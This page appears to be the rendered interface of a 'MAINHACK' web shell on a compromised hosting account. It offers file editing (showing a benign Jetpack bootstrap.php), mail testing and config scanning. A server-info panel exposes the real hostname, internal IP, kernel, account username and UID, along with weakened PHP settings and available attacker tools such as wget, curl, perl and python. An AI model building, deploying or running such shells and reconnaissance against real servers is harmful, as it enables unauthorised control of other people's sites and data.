[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: bootstrap.php
<?php /** * Bootstrap file for the nudges. * * @package Jetpack */ namespace Automattic\Jetpack\Dashboard_Customizations; use Automattic\Jetpack\Status; use Automattic\Jetpack\Status\Host; /** * The WP_Customize_Control core class is loaded only on customize_register. * * @param \WP_Customize_Manager $customize_manager Core customize manager. */ function register_css_nudge_control( \WP_Customize_Manager $customize_manager ) { require_once __DIR__ . '/additional-css/class-css-nudge-customize-control.php'; require_once __DIR__ . '/additional-css/class-css-customizer-nudge.php'; $domain = ( new Status() )->get_site_suffix(); if ( defined( 'IS_WPCOM' ) && IS_WPCOM ) { require_once __DIR__ . '/additional-css/class-wpcom-additional-css-manager.php'; $manager = new WPCOM_Additional_CSS_Manager( $domain ); } elseif ( ( new Host() )->is_woa_site() ) { require_once __DIR__ . '/additional-css/class-atomic-additional-css-manager.php'; $manager = new Atomic_Additional_CSS_Manager( $domain ); } if ( ! isset( $manager ) ) { return; } $manager->register_nudge( $customize_manager ); } /** * Load the bootstrap on init action. * * We need to load on init because otherwise the filter will not be set to true in WPCOM (since the add_filter is set on init). */ function load_bootstrap_on_init() { /** * Disable Additional CSS section from Customizer in WPCOM and Atomic and replace it with a nudge. * * @module masterbar * * @since 9.9.0 * * @param bool */ if ( \apply_filters( 'jetpack_customize_enable_additional_css_nudge', false ) ) { \add_action( 'customize_register', __NAMESPACE__ . '\register_css_nudge_control' ); } } add_action( 'init', __NAMESPACE__ . '\load_bootstrap_on_init' );
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129